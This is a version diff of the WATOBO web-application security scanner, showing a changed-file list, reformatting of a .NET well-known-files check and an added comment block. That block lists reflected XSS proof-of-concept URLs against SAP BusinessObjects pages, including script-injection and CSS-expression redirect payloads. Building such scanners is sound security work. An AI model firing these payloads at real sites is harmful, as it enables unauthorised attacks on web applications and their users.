watobo 0.9.21 → 0.9.23
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- data/CHANGELOG.md +46 -1
- data/bin/nfq_server.rb +0 -9
- data/bin/watobo_gui.rb +3 -13
- data/custom-views/prettify-json.rb +9 -18
- data/icons/watobo.ico +0 -0
- data/icons/watobo.ico.old +0 -0
- data/lib/watobo.rb +10 -19
- data/lib/watobo/adapters.rb +5 -14
- data/lib/watobo/adapters/data_store.rb +50 -59
- data/lib/watobo/adapters/file/file_store.rb +287 -296
- data/lib/watobo/adapters/file/marshal_store.rb +293 -296
- data/lib/watobo/adapters/session_store.rb +5 -14
- data/lib/watobo/ca.rb +1 -10
- data/lib/watobo/config.rb +197 -206
- data/lib/watobo/constants.rb +0 -9
- data/lib/watobo/core.rb +3 -12
- data/lib/watobo/core/active_check.rb +72 -135
- data/lib/watobo/core/active_checks.rb +49 -58
- data/lib/watobo/core/ca.rb +369 -389
- data/lib/watobo/core/cert_store.rb +34 -43
- data/lib/watobo/core/chat.rb +92 -101
- data/lib/watobo/core/chats.rb +271 -280
- data/lib/watobo/core/client_cert_store.rb +106 -35
- data/lib/watobo/core/conversation.rb +48 -57
- data/lib/watobo/core/cookie.rb +23 -32
- data/lib/watobo/core/egress_handlers.rb +98 -0
- data/lib/watobo/core/finding.rb +66 -75
- data/lib/watobo/core/findings.rb +107 -114
- data/lib/watobo/core/forwarding_proxy.rb +13 -22
- data/lib/watobo/core/fuzz_gen.rb +0 -9
- data/lib/watobo/core/intercept_carver.rb +166 -177
- data/lib/watobo/core/intercept_filter.rb +235 -244
- data/lib/watobo/core/interceptor.rb +98 -107
- data/lib/watobo/core/min_class.rb +4 -13
- data/lib/watobo/core/netfilter_queue.rb +170 -179
- data/lib/watobo/core/ott_cache.rb +132 -141
- data/lib/watobo/core/parameter.rb +43 -52
- data/lib/watobo/core/passive_check.rb +103 -102
- data/lib/watobo/core/passive_checks.rb +48 -57
- data/lib/watobo/core/passive_scanner.rb +54 -55
- data/lib/watobo/core/plugin.rb +11 -20
- data/lib/watobo/core/project.rb +3 -9
- data/lib/watobo/core/proxy.rb +43 -52
- data/lib/watobo/core/request.rb +125 -123
- data/lib/watobo/core/response.rb +44 -53
- data/lib/watobo/core/scanner.rb +0 -9
- data/lib/watobo/core/scanner3.rb +405 -414
- data/lib/watobo/core/scope.rb +83 -92
- data/lib/watobo/core/session.rb +1043 -1026
- data/lib/watobo/core/sid_cache.rb +98 -107
- data/lib/watobo/core/subscriber.rb +25 -34
- data/lib/watobo/defaults.rb +21 -30
- data/lib/watobo/external/diff/lcs.rb +0 -9
- data/lib/watobo/external/diff/lcs/array.rb +0 -9
- data/lib/watobo/external/diff/lcs/block.rb +0 -9
- data/lib/watobo/external/diff/lcs/callbacks.rb +0 -9
- data/lib/watobo/external/diff/lcs/change.rb +0 -9
- data/lib/watobo/external/diff/lcs/hunk.rb +0 -9
- data/lib/watobo/external/diff/lcs/ldiff.rb +0 -9
- data/lib/watobo/external/diff/lcs/string.rb +0 -9
- data/lib/watobo/externals.rb +6 -15
- data/lib/watobo/framework.rb +4 -13
- data/lib/watobo/framework/create_project.rb +60 -69
- data/lib/watobo/framework/init.rb +0 -9
- data/lib/watobo/framework/init_modules.rb +0 -9
- data/lib/watobo/framework/license_text.rb +28 -37
- data/lib/watobo/framework/load_chat.rb +13 -22
- data/lib/watobo/gui.rb +132 -123
- data/lib/watobo/gui/about_watobo.rb +0 -9
- data/lib/watobo/gui/browser_preview.rb +0 -9
- data/lib/watobo/gui/certificate_dialog.rb +0 -9
- data/lib/watobo/gui/chat_diff.rb +0 -9
- data/lib/watobo/gui/chatviewer_frame.rb +73 -72
- data/lib/watobo/gui/checkboxtree.rb +0 -9
- data/lib/watobo/gui/checks_policy_frame.rb +0 -9
- data/lib/watobo/gui/client_cert_dialog.rb +96 -87
- data/lib/watobo/gui/confirm_scan_dialog.rb +0 -9
- data/lib/watobo/gui/conversation_table.rb +158 -164
- data/lib/watobo/gui/conversation_table_ctrl.rb +207 -216
- data/lib/watobo/gui/conversation_table_ctrl2.rb +373 -382
- data/lib/watobo/gui/csrf_token_dialog.rb +0 -9
- data/lib/watobo/gui/custom_viewer.rb +374 -383
- data/lib/watobo/gui/dashboard.rb +296 -303
- data/lib/watobo/gui/define_scope_frame.rb +0 -9
- data/lib/watobo/gui/differ_frame.rb +215 -224
- data/lib/watobo/gui/edit_comment.rb +0 -9
- data/lib/watobo/gui/edit_scope_dialog.rb +0 -9
- data/lib/watobo/gui/export_dialog.rb +104 -113
- data/lib/watobo/gui/finding_info.rb +0 -9
- data/lib/watobo/gui/findings_tree.rb +210 -217
- data/lib/watobo/gui/full_scan_dialog.rb +0 -9
- data/lib/watobo/gui/fuzzer_gui.rb +1295 -1313
- data/lib/watobo/gui/fxsave_thread.rb +14 -0
- data/lib/watobo/gui/goto_url_dialog.rb +70 -79
- data/lib/watobo/gui/hex_viewer.rb +0 -9
- data/lib/watobo/gui/html_viewer.rb +287 -296
- data/lib/watobo/gui/intercept_filter_dialog.rb +188 -197
- data/lib/watobo/gui/interceptor_gui.rb +1041 -1051
- data/lib/watobo/gui/interceptor_settings_dialog.rb +0 -9
- data/lib/watobo/gui/json_viewer.rb +287 -0
- data/lib/watobo/gui/list_box.rb +101 -110
- data/lib/watobo/gui/log_file_viewer.rb +32 -41
- data/lib/watobo/gui/log_viewer.rb +83 -88
- data/lib/watobo/gui/login_wizzard.rb +0 -9
- data/lib/watobo/gui/main_window.rb +587 -618
- data/lib/watobo/gui/manual_request_editor.rb +620 -565
- data/lib/watobo/gui/master_pw_dialog.rb +0 -9
- data/lib/watobo/gui/mixins/gui_settings.rb +29 -38
- data/lib/watobo/gui/page_tree.rb +217 -226
- data/lib/watobo/gui/password_policy_dialog.rb +0 -9
- data/lib/watobo/gui/plugin_board.rb +0 -9
- data/lib/watobo/gui/preferences_dialog.rb +0 -9
- data/lib/watobo/gui/progress_window.rb +17 -27
- data/lib/watobo/gui/project_wizzard.rb +0 -9
- data/lib/watobo/gui/proxy_dialog.rb +1 -10
- data/lib/watobo/gui/quick_scan_dialog.rb +0 -9
- data/lib/watobo/gui/request_builder_frame.rb +102 -111
- data/lib/watobo/gui/request_editor.rb +181 -137
- data/lib/watobo/gui/rewrite_filters_dialog.rb +394 -403
- data/lib/watobo/gui/rewrite_rules_dialog.rb +372 -381
- data/lib/watobo/gui/save_chat_dialog.rb +140 -149
- data/lib/watobo/gui/scanner_settings_dialog.rb +0 -9
- data/lib/watobo/gui/select_chat_dialog.rb +0 -9
- data/lib/watobo/gui/session_management_dialog.rb +0 -9
- data/lib/watobo/gui/sites_tree.rb +0 -9
- data/lib/watobo/gui/status_bar.rb +0 -9
- data/lib/watobo/gui/table_editor.rb +0 -9
- data/lib/watobo/gui/tagless_viewer.rb +0 -9
- data/lib/watobo/gui/templates/plugin.rb +0 -9
- data/lib/watobo/gui/templates/plugin2.rb +92 -100
- data/lib/watobo/gui/templates/plugin_base.rb +144 -153
- data/lib/watobo/gui/text_viewer.rb +0 -9
- data/lib/watobo/gui/transcoder_window.rb +0 -9
- data/lib/watobo/gui/utils/gui_utils.rb +0 -9
- data/lib/watobo/gui/utils/init_icons.rb +86 -95
- data/lib/watobo/gui/utils/load_icons.rb +33 -42
- data/lib/watobo/gui/utils/load_plugins.rb +116 -119
- data/lib/watobo/gui/utils/master_password.rb +68 -77
- data/lib/watobo/gui/utils/save_default_settings.rb +113 -122
- data/lib/watobo/gui/utils/save_project_settings.rb +0 -9
- data/lib/watobo/gui/utils/save_proxy_settings.rb +41 -50
- data/lib/watobo/gui/utils/save_scanner_settings.rb +18 -27
- data/lib/watobo/gui/utils/session_history.rb +112 -121
- data/lib/watobo/gui/workspace_dialog.rb +0 -9
- data/lib/watobo/gui/www_auth_dialog.rb +0 -9
- data/lib/watobo/gui/xml_viewer_frame.rb +0 -9
- data/lib/watobo/http.rb +4 -13
- data/lib/watobo/http/cookies/cookies.rb +26 -35
- data/lib/watobo/http/data/data.rb +45 -54
- data/lib/watobo/http/data/json.rb +47 -55
- data/lib/watobo/http/url/url.rb +38 -47
- data/lib/watobo/http/xml/xml.rb +124 -130
- data/lib/watobo/interceptor.rb +3 -12
- data/lib/watobo/interceptor/proxy.rb +742 -739
- data/lib/watobo/interceptor/transparent.rb +22 -24
- data/lib/watobo/mixins.rb +10 -19
- data/lib/watobo/mixins/check_info.rb +27 -36
- data/lib/watobo/mixins/httpparser.rb +613 -637
- data/lib/watobo/mixins/request_parser.rb +88 -97
- data/lib/watobo/mixins/shapers.rb +515 -529
- data/lib/watobo/mixins/transcoders.rb +3 -11
- data/lib/watobo/parser.rb +1 -10
- data/lib/watobo/parser/html.rb +83 -92
- data/lib/watobo/patch_fxruby_setfocus.rb +26 -0
- data/lib/watobo/sockets.rb +3 -12
- data/lib/watobo/sockets/agent.rb +828 -837
- data/lib/watobo/sockets/client_socket.rb +308 -312
- data/lib/watobo/sockets/connection.rb +401 -410
- data/lib/watobo/sockets/http_socket.rb +11 -13
- data/lib/watobo/sockets/ntlm_auth.rb +129 -138
- data/lib/watobo/utils.rb +10 -19
- data/lib/watobo/utils/check_regex.rb +0 -9
- data/lib/watobo/utils/copy_object.rb +0 -9
- data/lib/watobo/utils/crypto.rb +0 -9
- data/lib/watobo/utils/expand_range.rb +23 -32
- data/lib/watobo/utils/export_xml.rb +97 -106
- data/lib/watobo/utils/file_management.rb +9 -11
- data/lib/watobo/utils/hexprint.rb +9 -18
- data/lib/watobo/utils/load_chat.rb +0 -9
- data/lib/watobo/utils/load_icon.rb +0 -9
- data/lib/watobo/utils/ntlm.rb +866 -875
- data/lib/watobo/utils/print_debug.rb +12 -21
- data/lib/watobo/utils/response_builder.rb +90 -99
- data/lib/watobo/utils/response_hash.rb +0 -9
- data/lib/watobo/utils/secure_eval.rb +0 -9
- data/lib/watobo/utils/strings.rb +10 -19
- data/lib/watobo/utils/text2request.rb +0 -9
- data/lib/watobo/utils/url.rb +23 -32
- data/lib/watobo/utils/utf16.rb +11 -20
- data/modules/active/Apache/mod_status.rb +0 -9
- data/modules/active/Apache/multiview.rb +151 -160
- data/modules/active/Flash/crossdomain.rb +0 -9
- data/modules/active/JWT/jwt_oauth2_none.rb +111 -0
- data/modules/active/cq5/cq5_default_selectors.rb +106 -115
- data/modules/active/cq5/cqp_user_enumeration.rb +125 -134
- data/modules/active/directories/dirwalker.rb +0 -9
- data/modules/active/discovery/fileextensions.rb +0 -9
- data/modules/active/discovery/http_methods.rb +0 -9
- data/modules/active/discovery/jsmapfiles.rb +79 -0
- data/modules/active/domino/domino_db.rb +68 -76
- data/modules/active/dotNET/custom_errors.rb +102 -111
- data/modules/active/dotNET/dotnet_files.rb +90 -99
- data/modules/active/fileinclusion/lfi_simple.rb +0 -9
- data/modules/active/jboss/jboss_basic.rb +0 -9
- data/modules/active/sap/business_objects.rb +51 -60
- data/modules/active/sap/its_commands.rb +0 -9
- data/modules/active/sap/its_service_parameter.rb +0 -9
- data/modules/active/sap/its_services.rb +0 -9
- data/modules/active/sap/its_xss.rb +0 -9
- data/modules/active/shell_shock/shell_shock.rb +139 -148
- data/modules/active/siebel/siebel_apps.rb +160 -169
- data/modules/active/sqlinjection/sql_boolean.rb +0 -9
- data/modules/active/sqlinjection/sql_numerical.rb +198 -0
- data/modules/active/sqlinjection/sqli_error.rb +0 -9
- data/modules/active/sqlinjection/sqli_timing.rb +220 -229
- data/modules/active/struts2/default_handler_ognl.rb +106 -115
- data/modules/active/struts2/include_params_ognl.rb +105 -114
- data/modules/active/xml/xml_xxe.rb +112 -123
- data/modules/active/xss/xss_ng.rb +214 -223
- data/modules/active/xss/xss_simple.rb +0 -9
- data/modules/passive/ajax.rb +68 -77
- data/modules/passive/autocomplete.rb +56 -65
- data/modules/passive/cookie_options.rb +0 -9
- data/modules/passive/cookie_xss.rb +0 -9
- data/modules/passive/detect_code.rb +0 -9
- data/modules/passive/detect_fileupload.rb +0 -9
- data/modules/passive/detect_infrastructure.rb +0 -9
- data/modules/passive/detect_one_time_tokens.rb +0 -9
- data/modules/passive/dirindexing.rb +0 -9
- data/modules/passive/disclosure_domino.rb +55 -64
- data/modules/passive/disclosure_emails.rb +0 -9
- data/modules/passive/disclosure_ipaddr.rb +55 -53
- data/modules/passive/filename_as_parameter.rb +0 -9
- data/modules/passive/form_spotter.rb +0 -9
- data/modules/passive/hidden_fields.rb +50 -59
- data/modules/passive/hotspots.rb +0 -9
- data/modules/passive/in_script_parameter.rb +0 -9
- data/modules/passive/json_web_token.rb +93 -0
- data/modules/passive/multiple_server_headers.rb +0 -9
- data/modules/passive/possible_login.rb +0 -9
- data/modules/passive/redirect_url.rb +0 -9
- data/modules/passive/redirectionz.rb +0 -9
- data/modules/passive/sap-headers.rb +56 -65
- data/modules/passive/xss_dom.rb +0 -9
- data/plugins/aem/aem.rb +11 -20
- data/plugins/aem/gui/main.rb +118 -127
- data/plugins/aem/gui/tree_view.rb +171 -180
- data/plugins/aem/lib/agent.rb +130 -138
- data/plugins/aem/lib/dispatcher.rb +45 -51
- data/plugins/aem/lib/engine.rb +177 -186
- data/plugins/catalog/catalog.rb +345 -355
- data/plugins/crawler/crawler.rb +4 -13
- data/plugins/crawler/gui.rb +5 -14
- data/plugins/crawler/gui/auth_frame.rb +270 -279
- data/plugins/crawler/gui/crawler_gui.rb +271 -276
- data/plugins/crawler/gui/general_settings_frame.rb +96 -105
- data/plugins/crawler/gui/hooks_frame.rb +80 -89
- data/plugins/crawler/gui/scope_frame.rb +50 -59
- data/plugins/crawler/gui/settings_tabbook.rb +38 -47
- data/plugins/crawler/gui/status_frame.rb +59 -68
- data/plugins/crawler/lib/bags.rb +18 -27
- data/plugins/crawler/lib/constants.rb +11 -20
- data/plugins/crawler/lib/engine.rb +488 -497
- data/plugins/crawler/lib/grabber.rb +68 -77
- data/plugins/crawler/lib/status.rb +71 -80
- data/plugins/crawler/lib/uri_mp.rb +12 -21
- data/plugins/filefinder/filefinder.rb +326 -333
- data/plugins/sqlmap/bin/test.rb +78 -87
- data/plugins/sqlmap/gui.rb +4 -13
- data/plugins/sqlmap/gui/main.rb +218 -227
- data/plugins/sqlmap/gui/options_frame.rb +97 -106
- data/plugins/sqlmap/lib/sqlmap_ctrl.rb +90 -100
- data/plugins/sqlmap/sqlmap.rb +2 -11
- data/plugins/sslchecker/cli/sslchecker_cli.rb +0 -9
- data/plugins/sslchecker/gui/cipher_table.rb +246 -254
- data/plugins/sslchecker/gui/gui.rb +258 -264
- data/plugins/sslchecker/gui/sslchecker.rb +4 -13
- data/plugins/sslchecker/lib/check.rb +127 -133
- data/plugins/wshell/gui/main.rb +119 -117
- data/plugins/wshell/lib/core.rb +38 -88
- data/plugins/wshell/wshell.rb +11 -20
- metadata +170 -164
@@ -1,100 +1,91 @@
|
|
1
|
-
#.
|
2
|
-
# dotnet_files.rb
|
3
|
-
#.
|
4
|
-
# Copyright 2014 by siberas, http://www.siberas.de
|
5
|
-
# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
|
6
|
-
# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
|
7
|
-
# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
|
8
|
-
# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
9
|
-
|
10
1
|
# @private
|
11
|
-
module Watobo#:nodoc: all
|
12
|
-
module Modules
|
13
|
-
module Active
|
14
|
-
module Dotnet
|
15
|
-
|
16
|
-
#class Dir_indexing < Watobo::Mixin::Session
|
17
|
-
class Dotnet_files < Watobo::ActiveCheck
|
18
|
-
@@tested_directories = Hash.new
|
19
|
-
|
20
|
-
@info.update(
|
21
|
-
:check_name => '.NET Files', # name of check which briefly describes functionality, will be used for tree and progress views
|
22
|
-
:description => "This module checks your application for well known files, e.g. trace.axd.", # description of checkfunction
|
23
|
-
:author => "Andreas Schmidt", # author of check
|
24
|
-
:version => "1.0", # check version
|
25
|
-
:check_group => ".NET"
|
26
|
-
)
|
27
|
-
|
28
|
-
@finding.update(
|
29
|
-
:threat => 'Information Disclosure.', # thread of vulnerability, e.g. loss of information
|
30
|
-
:class => ".NET: Well-Known Files", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
|
31
|
-
:type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
|
32
|
-
:rating => VULN_RATING_INFO
|
33
|
-
)
|
34
|
-
|
35
|
-
def initialize(project, prefs={})
|
36
|
-
super(project, prefs)
|
37
|
-
|
38
|
-
@wnfs = []
|
39
|
-
@wnfs << { :name => "Trace.axd", :pattern => "Trace\.axd.clear=1" }
|
40
|
-
@wnfs << { :name => "elmah.axd", :pattern => "Error log for" }
|
41
|
-
|
42
|
-
|
43
|
-
end
|
44
|
-
|
45
|
-
def reset()
|
46
|
-
@@tested_directories.clear
|
47
|
-
end
|
48
|
-
|
49
|
-
def generateChecks(chat)
|
50
|
-
|
51
|
-
begin
|
52
|
-
path = chat.request.dir
|
53
|
-
if !@@tested_directories.has_key?(path) then
|
54
|
-
@@tested_directories[path] = true
|
55
|
-
@wnfs.each do |wnf|
|
56
|
-
checker = proc {
|
57
|
-
begin
|
58
|
-
test_request = nil
|
59
|
-
test_response = nil
|
60
|
-
|
61
|
-
test = chat.copyRequest
|
62
|
-
|
63
|
-
test.replaceFileExt(wnf[:name])
|
64
|
-
status, test_request, test_response = fileExists?(test)
|
65
|
-
|
66
|
-
|
67
|
-
if status == true and test_response.has_body?
|
68
|
-
if test_response.body =~ /#{wnf[:pattern]}/
|
69
|
-
addFinding( test_request, test_response,
|
70
|
-
:test_item => "#{wnf[:name]}",
|
71
|
-
:proof_pattern => "#{wnf[:pattern]}",
|
72
|
-
:check_pattern => "#{Regexp.quote(wnf[:name])}",
|
73
|
-
:chat => chat,
|
74
|
-
:threat => "depends on the file ;)",
|
75
|
-
:title => "[#{wnf[:name]}]"
|
76
|
-
)
|
77
|
-
end
|
78
|
-
|
79
|
-
end
|
80
|
-
rescue => bang
|
81
|
-
puts bang
|
82
|
-
puts bang.backtrace if $DEBUG
|
83
|
-
end
|
84
|
-
[ test_request, test_response ]
|
85
|
-
|
86
|
-
}
|
87
|
-
yield checker
|
88
|
-
end
|
89
|
-
end
|
90
|
-
rescue => bang
|
91
|
-
puts "!error in module #{Module.nesting[0].name}"
|
92
|
-
puts bang
|
93
|
-
end
|
94
|
-
end
|
95
|
-
|
96
|
-
end
|
97
|
-
end
|
98
|
-
end
|
99
|
-
end
|
100
|
-
end
|
2
|
+
module Watobo#:nodoc: all
|
3
|
+
module Modules
|
4
|
+
module Active
|
5
|
+
module Dotnet
|
6
|
+
|
7
|
+
#class Dir_indexing < Watobo::Mixin::Session
|
8
|
+
class Dotnet_files < Watobo::ActiveCheck
|
9
|
+
@@tested_directories = Hash.new
|
10
|
+
|
11
|
+
@info.update(
|
12
|
+
:check_name => '.NET Files', # name of check which briefly describes functionality, will be used for tree and progress views
|
13
|
+
:description => "This module checks your application for well known files, e.g. trace.axd.", # description of checkfunction
|
14
|
+
:author => "Andreas Schmidt", # author of check
|
15
|
+
:version => "1.0", # check version
|
16
|
+
:check_group => ".NET"
|
17
|
+
)
|
18
|
+
|
19
|
+
@finding.update(
|
20
|
+
:threat => 'Information Disclosure.', # thread of vulnerability, e.g. loss of information
|
21
|
+
:class => ".NET: Well-Known Files", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
|
22
|
+
:type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
|
23
|
+
:rating => VULN_RATING_INFO
|
24
|
+
)
|
25
|
+
|
26
|
+
def initialize(project, prefs={})
|
27
|
+
super(project, prefs)
|
28
|
+
|
29
|
+
@wnfs = []
|
30
|
+
@wnfs << { :name => "Trace.axd", :pattern => "Trace\.axd.clear=1" }
|
31
|
+
@wnfs << { :name => "elmah.axd", :pattern => "Error log for" }
|
32
|
+
|
33
|
+
|
34
|
+
end
|
35
|
+
|
36
|
+
def reset()
|
37
|
+
@@tested_directories.clear
|
38
|
+
end
|
39
|
+
|
40
|
+
def generateChecks(chat)
|
41
|
+
|
42
|
+
begin
|
43
|
+
path = chat.request.dir
|
44
|
+
if !@@tested_directories.has_key?(path) then
|
45
|
+
@@tested_directories[path] = true
|
46
|
+
@wnfs.each do |wnf|
|
47
|
+
checker = proc {
|
48
|
+
begin
|
49
|
+
test_request = nil
|
50
|
+
test_response = nil
|
51
|
+
|
52
|
+
test = chat.copyRequest
|
53
|
+
|
54
|
+
test.replaceFileExt(wnf[:name])
|
55
|
+
status, test_request, test_response = fileExists?(test)
|
56
|
+
|
57
|
+
|
58
|
+
if status == true and test_response.has_body?
|
59
|
+
if test_response.body =~ /#{wnf[:pattern]}/
|
60
|
+
addFinding( test_request, test_response,
|
61
|
+
:test_item => "#{wnf[:name]}",
|
62
|
+
:proof_pattern => "#{wnf[:pattern]}",
|
63
|
+
:check_pattern => "#{Regexp.quote(wnf[:name])}",
|
64
|
+
:chat => chat,
|
65
|
+
:threat => "depends on the file ;)",
|
66
|
+
:title => "[#{wnf[:name]}]"
|
67
|
+
)
|
68
|
+
end
|
69
|
+
|
70
|
+
end
|
71
|
+
rescue => bang
|
72
|
+
puts bang
|
73
|
+
puts bang.backtrace if $DEBUG
|
74
|
+
end
|
75
|
+
[ test_request, test_response ]
|
76
|
+
|
77
|
+
}
|
78
|
+
yield checker
|
79
|
+
end
|
80
|
+
end
|
81
|
+
rescue => bang
|
82
|
+
puts "!error in module #{Module.nesting[0].name}"
|
83
|
+
puts bang
|
84
|
+
end
|
85
|
+
end
|
86
|
+
|
87
|
+
end
|
88
|
+
end
|
89
|
+
end
|
90
|
+
end
|
91
|
+
end
|
@@ -1,12 +1,3 @@
|
|
1
|
-
#.
|
2
|
-
# lfi_simple.rb
|
3
|
-
#.
|
4
|
-
# Copyright 2014 by siberas, http://www.siberas.de
|
5
|
-
# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
|
6
|
-
# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
|
7
|
-
# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
|
8
|
-
# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
9
|
-
|
10
1
|
require 'digest/md5'
|
11
2
|
require 'digest/sha1'
|
12
3
|
|
@@ -1,12 +1,3 @@
|
|
1
|
-
#.
|
2
|
-
# jboss_basic.rb
|
3
|
-
#.
|
4
|
-
# Copyright 2014 by siberas, http://www.siberas.de
|
5
|
-
# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
|
6
|
-
# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
|
7
|
-
# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
|
8
|
-
# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
9
|
-
|
10
1
|
# @private
|
11
2
|
module Watobo#:nodoc: all
|
12
3
|
module Modules
|
@@ -1,63 +1,54 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
|
4
|
-
|
5
|
-
|
6
|
-
|
7
|
-
|
8
|
-
|
1
|
+
=begin
|
2
|
+
http://www.example.com:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
3
|
+
http://www.example.com:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script>
|
4
|
+
http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1§ionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1&
|
5
|
+
http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&
|
6
|
+
http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>
|
7
|
+
http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script>
|
8
|
+
http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1&
|
9
|
+
http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script>
|
10
|
+
http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1&
|
11
|
+
http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script>
|
12
|
+
http://www.example.com:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script>
|
13
|
+
http://www.example.com:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script>
|
14
|
+
http://www.example.com:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
|
15
|
+
http://www.example.com:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=�></script><script>alert(1)</script>
|
16
|
+
http://www.example.com:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
|
17
|
+
http://www.example.com:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
18
|
+
http://www.example.com:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=�><script>alert(1)</script>
|
19
|
+
http://www.example.com:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
|
20
|
+
http://www.example.com:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
|
21
|
+
http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1&
|
22
|
+
http://www.example.com:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1&
|
23
|
+
http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=1&uid=1&variance=1&viewed=1&
|
24
|
+
http://www.example.com:6405//PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&progtrend=1&progtrendImage=1&viewed=1&
|
25
|
+
http://www.example.com:8080/PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-*/STYLE=xss:e/**/xpression(location='http://www.procheckup.com')>
|
26
|
+
